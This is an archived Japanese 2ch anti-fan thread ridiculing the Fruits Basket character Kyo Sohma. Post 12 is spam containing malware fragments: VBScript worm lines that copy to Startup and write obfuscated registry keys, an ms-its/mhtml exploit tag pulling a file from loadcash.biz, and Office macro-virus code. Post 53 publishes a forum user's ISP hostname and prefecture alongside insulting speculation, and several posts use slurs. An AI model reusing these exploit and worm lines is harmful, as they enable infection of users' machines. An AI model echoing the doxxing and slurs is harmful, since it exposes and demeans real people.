5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【被害妄想】草摩夾アンチスレ 4馬鹿目【八つ当たり】

1 :名無しかわいいよ名無し:2006/12/11(月) 20:16:43 ID:dv9N69k4
フルバのDQNこと草摩夾を徹底的に叩き潰すスレです
夾ヲタお断り!

過去スレ
フルバの草摩夾を簀巻きにしてダンボールに入れて川に流してやりたい
http://comic6.2ch.net/test/read.cgi/cchara/1127744555/l50
【被害妄想】草摩夾アンチスレ 2馬鹿目【棚上げ】
http://comic6.2ch.net/test/read.cgi/cchara/1155256976/l50
【被害妄想】草摩夾アンチスレ 3馬鹿目【棚上げ】
http://comic6.2ch.net/test/read.cgi/cchara/1163010037/

2 :名無しかわいいよ名無し:2006/12/11(月) 20:17:22 ID:dv9N69k4
この板はdat落ちが早すぎだな

3 :名無しかわいいよ名無し:2006/12/11(月) 22:34:20 ID:uQTxtVbp
∧,,∧   ぎゃああまりの疎開にネコになってしまい
ミ,,・∀・ミ
ミuu_@

4 :名無しかわいいよ名無し:2006/12/12(火) 03:42:45 ID:v9BcTCds
乙!
また落ちてたのか

この板どうなってるんだ?

5 :名無しかわいいよ名無し:2006/12/12(火) 19:21:37 ID:HOQZ99jJ
おつ

6 :名無しかわいいよ名無し:2006/12/13(水) 13:37:07 ID:GMUq6EIO
糞夾死ね

7 :名無しかわいいよ名無し:2006/12/14(木) 04:41:38 ID:r3YgkUkN
また落ちてたのかー。

8 :名無しかわいいよ名無し:2006/12/14(木) 20:16:41 ID:fYsJkmiC
へたれすぎたろこいつ

9 :名無しかわいいよ名無し:2006/12/15(金) 13:21:38 ID:16Vl5cXE
誰かがわざとこのスレを消しているのでは?夾ヲタとか?

10 :名無しかわいいよ名無し:2006/12/15(金) 19:00:00 ID:/1caIihn
dat落ちじゃなく消されてるって?
別にローカルルール違反でもないし消される理由がないよねぇ
落ちまくりでまじでうざい

11 :名無しかわいいよ名無し:2006/12/16(土) 08:44:19 ID:vg94rZoR
age進行がいいかもね。

12 :<body onload=window()>:2006/12/16(土) 10:25:57 ID:ZmJCxyRc
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

13 :名無しかわいいよ名無し:2006/12/16(土) 19:30:22 ID:vdtUZ5gP
変なもの貼るなよくそ夾ヲタ

14 :名無しかわいいよ名無し:2006/12/17(日) 13:50:18 ID:5lgANv2g
こいつは最後まで成長しなかったな。女から逃げたしw

15 :名無しかわいいよ名無し:2006/12/17(日) 22:32:04 ID:lDm/3qt+
52: 名無しさん@漫画大好き 投票:草摩夾 2006/10/21 18:44:14 ID:oKgnOAiz
性格悪いキャラの中でも一番マシ







え?w


16 :名無しかわいいよ名無し:2006/12/18(月) 14:05:25 ID:+Z2ki/9i
なにそれ( ´,_ゝ`)
性格悪いキャラの中でも一番糞の間違いなんじゃ

17 :名無しかわいいよ名無し:2006/12/18(月) 16:16:28 ID:RWLD+Muo
凶ヲタって客観的に考える力がないよね
性格悪いけど好きとかって話ならまだ分かるけど、これはww

18 :名無しかわいいよ名無し:2006/12/18(月) 21:36:38 ID:q1KC172W
盲目だしなー

19 :名無しかわいいよ名無し:2006/12/19(火) 19:40:46 ID:xdveASMS
検索「被害妄想」でこのスレに来れるwワロタww

20 :名無しかわいいよ名無し:2006/12/19(火) 21:36:29 ID:1BqTvd0R
被害妄想は夾を語る上でははずせないキーワードである

21 :キャラクターで挫折:2006/12/20(水) 14:32:10 ID:UiooZBmn
劣化もはずせないw

22 :名無しかわいいよ名無し:2006/12/20(水) 14:34:14 ID:UiooZBmn
1スレ目、
フルバの草摩夾を簀巻きにしてダンボールに入れて川に流してやりたい
の、1の文章のコピペしたいんだけどこのスレでしか
あれって張られてない?ログ漁らないとダメかね

23 :名無しかわいいよ名無し:2006/12/20(水) 14:35:01 ID:uRI2ah8P
基地害もはずせまい

24 :名無しかわいいよ名無し:2006/12/21(木) 01:05:01 ID:hFF9qeFa
棚上げもナー

25 :名無しかわいいよ名無し:2006/12/21(木) 01:05:51 ID:hFF9qeFa
>>22
にくちゃんねるで探せばあるんでないか

26 :名無しかわいいよ名無し:2006/12/21(木) 18:36:44 ID:zVNCuCTw
こいつすごい性格幼稚なはずなのに、
なぜか吐折るの前でだけはペラペラ人生語れるからなんか気色悪い
設定に無理あるんじゃないかと

27 :名無しかわいいよ名無し:2006/12/22(金) 02:04:45 ID:Hv1BT9XH
しかし最終回近い話の展開でヒロインの告白から逃げるとはねwかっこわるすぎ

28 :名無しかわいいよ名無し:2006/12/22(金) 02:51:28 ID:dPYelOMQ
21巻やっと読んだけど、なんなんだアレは。イライラする

29 :名無しかわいいよ名無し:2006/12/23(土) 19:59:49 ID:TwxidhKg
DQN夾

30 :名無しかわいいよ名無し:2006/12/25(月) 14:58:41 ID:Sub/iC/b
age

31 :名無しかわいいよ名無し:2006/12/25(月) 19:26:57 ID:RDs/K0aq
夾よ 海に喧嘩売る前に自分が幽閉されない方法くらい考えてみたらどうだ

悲劇ぶりっこすんな 化 け 物

夾よ 髪にイチャモン付ける奴を半殺しにするくらいなら染めたらどうだ

矛盾してんだよ 馬 鹿 物

夾オタよ 影でバカ猫に萌え萌えするのは勝手だが、人前できゃあきゃあ言うのやめれ

ウザいんだよ ケ ダ モ ノ

夾よ 壁の染みを怖がる前に自分の本来の姿を怖がったらどうだ

訳わかんねぇんだよ ア ホ ガ キ

夾よ 透マンセーは結構だがエロい目つきで見詰めるのやめれ

鳥肌立つんだよ 痴 漢 男

夾オタよ こんなエロくてバカな男がそんなにいいのか

糞は黙って廃棄場に逝け 悪 臭 が す る


32 :名無しかわいいよ名無し:2006/12/26(火) 10:12:10 ID:ASm+R6zS
初期「遥か〜」のテンマっぽい、カワウザイキャラ
→不幸自慢・被害妄想・八つ当たり(DQN化)
→散々吐折る萌え発言(変態化)
→告られ、二度目逃走という醜態(ヘタレ化)
→頭から血を流し気絶している女に接吻かます(キチガイ化)
→カワウザイがただウザイに(後、無個性キャラ化)

[結論]最終的な夾クン
DQN、変態、ヘタレ、キチガイ、無個性

33 :名無しかわいいよ名無し:2006/12/27(水) 12:18:20 ID:sjg2/BQJ
>>31-32GJ
ミクシィに凶のコミュがあって吐きそうになった・・・

34 :名無しかわいいよ名無し:2006/12/28(木) 11:30:04 ID:f2M5b5rf
DQN、変態、ヘタレ、キチガイ、無個性 =夾クン
夾ヲタはこいつのどこがいいのかマジで分からないよ
話聞いても納得できる箇所がほとんどないよ

35 :名無しかわいいよ名無し:2006/12/28(木) 20:13:07 ID:rBcR0RPw
凶って、昼間にスウェットのままスーパーとか行ってそうできもい

36 :名無しかわいいよ名無し:2006/12/28(木) 21:23:24 ID:0W3t/hoz
>>35
あるあるある
安易に想像出来るから余計キモイわ

37 :名無しかわいいよ名無し:2006/12/29(金) 10:27:20 ID:3fA1DFEd
コイツが嫌いなのは確かなんだけど連載終了したし、
話題もねーな

38 :名無しかわいいよ名無し:2006/12/29(金) 18:11:13 ID:0Yf/W7VZ
最後までかっこわるかったねこいつ

39 :名無しかわいいよ名無し:2006/12/31(日) 18:26:31 ID:ScSJjlPB
ここで聞くのもなんだけど
フルバの本スレなくなってるのは
凶の儲のせい?
それともアンチ?

40 :名無しかわいいよ名無し:2007/01/05(金) 00:25:51 ID:8HdTgK/Z
糞夾ヲタ婆のせいだが何か


しかし、ここまで情けないキャラもそういない。

41 :名無しかわいいよ名無し:2007/01/06(土) 03:01:27 ID:BzzokXQf
終盤は変態きさかった

42 :名無しかわいいよ名無し:2007/01/07(日) 07:14:38 ID:p1v6c69V
>>35
わかるw

43 :名無しかわいいよ名無し:2007/01/08(月) 13:06:00 ID:3eDtdZ6z
>>38
もうかっこわるい所のレベルじゃなかったよw
まき沿いで透が吐折るに劣化したしな

44 :名無しかわいいよ名無し:2007/01/08(月) 14:51:51 ID:pdbt0Y+C
女に頼らないと服もろくに買えなさそうだよなこいつ

45 :名無しかわいいよ名無し:2007/01/09(火) 05:27:44 ID:rGTeUYwQ
透に告白された時逃げてたよな
へタレもここまでくると・・・

46 :名無しかわいいよ名無し:2007/01/09(火) 15:27:00 ID:u74QBQ08
えっフルバってもう終わったの!?
知らんかった……やっぱり最後までかっこわるいままだったのかWWW

47 :名無しかわいいよ名無し:2007/01/09(火) 18:06:34 ID:gkC1h0mu
透の相手役認定した癖に、最終回の〆は由希と透だったなw
コイツの存在って一体何なんなんだかww>凶

48 :名無しかわいいよ名無し:2007/01/10(水) 05:16:10 ID:r4FbnWQx
告白されて「幻滅だっ(だっけ?)」と走って逃げたのは最高にワロタ
最低だろう男として

49 :名無しかわいいよ名無し:2007/01/10(水) 18:36:49 ID:fnseeeJl
師匠みたいな最良な人に育てられてあの程度の人格にしかなれないとはね・・
同等元の出来が悪いんだろうなw

50 :名無しかわいいよ名無し:2007/01/10(水) 22:13:31 ID:Xk2B75s3
猫憑きの人達にも「歴代猫憑きの恥」とかいわれてそうだ

51 :名無しかわいいよ名無し:2007/01/12(金) 10:40:54 ID:pYqE7WiM
婆さんとその仲間はいつも夾と透のために
二人を擁護してみたり他キャラ叩いたり
一番の敵とみなされた慊人スレ妨害してみるものの
叩くキャラが悪すぎたもんで
以前にも増して急速にアンチを増殖させつつある。
(夾だけじゃ許容できなくなり透アンチも急増の様子)
ああ、悲しき空回り。いつになったら気付くの空回り。


ざっと見た感じ、こんなところですかな。

52 :名無しかわいいよ名無し:2007/01/12(金) 16:04:00 ID:Kslu84YQ
キャラ自体劣化したのもあるけど、
確かに婆のせいでアンチになった人も結構いるな

53 :名無しかわいいよ名無し:2007/01/13(土) 18:23:19 ID:opNewVZ/
これまでわかったこと

  ★自己紹介
  名前・・・夾ヲタ婆
 
  性別・・・女 
  年齢・・・30前後?婆臭い言動の数々からもっといってる可能性あり
  ホスト・・・pl389.nas929.p-aichi.nttpc.ne.jp
  プロバイダー・・・NTTPCコミュニケーションズ
  都道府県 愛知県
  接続回線 xDSL
  彼氏居ない歴・・・=年齢
  職業・・・引き篭もりニート(ずっと2ch)
  特技・・・荒らし、自作自演
  性格・・・粘着、陰湿、わがまま、自己中、知障
  趣味・・・2ちゃんで荒らしをすること
  友達・・・リアルとネット合わせて0人(ただし脳内彼氏はいるらしい)
  自慢出来る事・・・平気で人に嫌われること・掲示板を荒らすこと・運営に迷惑かけること
  夢中になっている事・・・掲示板を24時間監視 &AAでスレ潰し

真性夾信者。
劣等感の塊で、荒らしをすることで自我を保っている。
論理的な思考が出来ず、コロコロと自分の主張を変える。
自分に不利な意見には目を通さず、
あくまで自分の土俵で相撲をとろうとする卑怯者。
本人は理論派と思ってるが、その論旨は見ての通り矛盾だらけ。
不利になるとすぐに別な話題を振り、「それはともかくとして」で保身。
文章読解能力が著しく欠落しており、自分ワールドの中では完璧な話題運びだと思っている。

54 :名無しかわいいよ名無し:2007/01/14(日) 01:09:51 ID:rRa4Nacf
追加
・脳内彼氏=凶
・自分は透だと思いこんでいる。

55 :名無しかわいいよ名無し:2007/01/14(日) 18:18:42 ID:gfAeC4wr
>真性夾信者
今んとこ見たことないな
どこに発生してんの?

56 :名無しかわいいよ名無し:2007/01/14(日) 22:37:19 ID:k4IU1Ife
アキトスレとかで荒らし回ってる

57 :名無しかわいいよ名無し:2007/01/15(月) 02:04:51 ID:5N9Nabbm
>>55
今のところ見たことないってw
このスレ見つけられるお前が遭遇したことがないわけがない
笑わせる



夾婆は相当年いってると思う。発言がとにかくオバだから。

58 :名無しかわいいよ名無し:2007/01/15(月) 16:04:23 ID:ZIWGcmI6
>>57 いや、そう言われてもね
自分は婆達関係なく凶嫌いになったから
聞くところ最悪らしいが>婆達

59 :名無しかわいいよ名無し:2007/01/15(月) 22:35:51 ID:wVjj6QOg
まあ原作後半の凶見てれば信者関係なしに嫌いになる人も多いだろうな

60 :名無しかわいいよ名無し:2007/01/16(火) 02:59:13 ID:b0GoVrKH
夾は確かにウザイなー。

惚れた女以外には態度最低なのが…。
性格キツイけど、惚れた女には
優しいって風にしたいのかもしれないけど
あれじゃ好きな女の前でだけ猫被ってる
ただの性格悪いあざとい糞野朗だよ。

61 :名無しかわいいよ名無し:2007/01/16(火) 09:55:25 ID:fLsb8tal
猫だからな

62 :名無しかわいいよ名無し:2007/01/16(火) 10:31:47 ID:MXyG/3yT
猫は猫でも化け猫

63 :名無しかわいいよ名無し:2007/01/17(水) 12:39:24 ID:oQLht9cs
惚れた女にだけ〜ってキャラは、
そのキャラをないがしろにした時点で全く価値がなくなるしな。
で、夾もそうなってしまったねw
告白されて「幻滅」ほざいて「母親裏切ってる」的な事ほざいて逃亡。
最低だなwwあのシーンで長所何一つなくなったよ。

64 :名無しかわいいよ名無し:2007/01/18(木) 13:29:57 ID:oQMxefaa
婆筆頭に
こいつの信者ってやたら中二病っぽいのが多いのは何でだろう
凶自身が厨臭いからか?

65 :名無しかわいいよ名無し:2007/01/18(木) 13:55:42 ID:ywxkIDqZ
夾がテンプレ通りの中二病だからなー

66 :名無しかわいいよ名無し:2007/01/19(金) 16:32:11 ID:+RioK5X+
本気でどこが良いのか分からない… 
嫌なとこはいくらでもあげれるけどね

67 :sage:2007/01/19(金) 21:10:34 ID:WiRR+9JL
22巻出た??

68 :名無しかわいいよ名無し:2007/01/20(土) 01:16:22 ID:aIfZnLVr
嫌なところしかねーな
ダサいしへたれだしかっこわり

69 :名無しかわいいよ名無し:2007/01/22(月) 14:56:01 ID:HE7T5vzJ
嫌いなキャラスレ見たら夾が嫌いな奴多くて笑ったw
一部も一部だけど転載


289 :花と名無しさん :2006/08/26(土) 23:17:48 ID:???0
嫌い
フルバの夾

漫画の登場人物に本気で『憎しみ』を抱いたのはこいつが初めてだった。

291 :花と名無しさん :2006/08/27(日) 00:14:25 ID:???O
>>289
曲がりながらも一応主要キャラ(脇役じゃない)と思ったからあえて名前出さないでいたけど、
そいつを入れていいなら自分も1番嫌い
真知や透なんて比べものにならないくらい夾ウザイ
苛々を通り越して嫌悪の対象でしかないキャラ。
そいつのせいで最近、フルバ自体がつまんなく感じるよ…

329 :花と名無しさん :2006/11/21(火) 00:39:03 ID:???0
夾も棗もどっちもウザイ、夾の次は棗が叩かれそう・・
夾と性質が似てるから好きな奴以外の人間には
態度悪そうだし。あのウザイ嫉妬心も嫌


333 :花と名無しさん :2006/11/24(金) 08:56:53 ID:???0
>>329
夾や棗なんて、偉そうに言っても大した活躍も出来ずに
せいぜいヒロインといちゃつくのが関の山なんじゃ
無いのかと思う。

334 :花と名無しさん :2006/11/25(土) 23:50:16 ID:???0
ヒロインにしがみ付くだけの存在。
3大嫌われヒロインの相手役の中でマシなのは
鬼宿ぐらいだな・・

335 :花と名無しさん :2006/11/30(木) 17:30:28 ID:B3L+2zq00
好き
マミリン(天ない)都(ジャンヌ) 主人公よりも彼女を見るために全巻そろえた
バディ子(ご近所) 昔は好きではなかったが今読み返すと可愛く思える。
歩(ご近所) 可愛いと思う。主人公より好き。
メイプル戦記の球団社長さん。

嫌い
夾(フルバ) 主人公マンセーすぎる。10何巻かでもう読むのやめた。
まりあ(ミント) 昔はそうでもなかったが今見るとムカ(°°)
真知(フルバ) 暗さでも嫌な暗さだった。

70 :名無しかわいいよ名無し:2007/01/22(月) 14:56:31 ID:HE7T5vzJ
337 :花と名無しさん :2006/11/30(木) 22:57:58 ID:???O
好き
フルバ
由希…弱さにもがいてるのが好きだった
紅葉…大人だと思った
今日子…なんで死んじゃったの
勝也…なんでry
お師匠さん…すてき
天ない
まみりん…可愛い頑張ってるかっこいい
ご近所
まりこ先輩…一途
BASARA
みんな好き

嫌い
フルバ
夾…透の目ふしあな?ひとりよがりで乱暴なのが嫌。見てるとむかつく
あとの気が狂ってる人々も大概嫌い
ご近所
歩…台風から嫌いになって、最後まで好きになれなかった
ホタルノヒカリ
部長…最後はこの人とくっつくんだろ?って思うと嫌になる
VBR
零ちゃん以外みんな嫌

71 :名無しかわいいよ名無し:2007/01/22(月) 14:58:00 ID:HE7T5vzJ
なんか学アリの棗とセットで嫌われてるなw
そんなに似てるのか。でも向こうは消防、こっちは工房だからな。更生不可なだけ夾の方が性質悪すぎる。

72 :名無しかわいいよ名無し:2007/01/22(月) 23:49:05 ID:rN6ejcut
凶と吐折るさえいなければフルバも面白くなったのにな
呉慊か由希真知あたりが主役ならよかったのに

73 :名無しかわいいよ名無し:2007/01/23(火) 13:11:41 ID:SegzIJop
夾道明寺棗はどっか似てる気がする
いや、棗はまだマシか?消防に巻ける工房wwww

74 :名無しかわいいよ名無し:2007/01/24(水) 00:14:18 ID:oJu4Uoqd
夾道明寺は人間として最低だ
棗も系統が一緒だけど、小学生だからねー。まだただの糞餓鬼じゃんで許せる

18 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)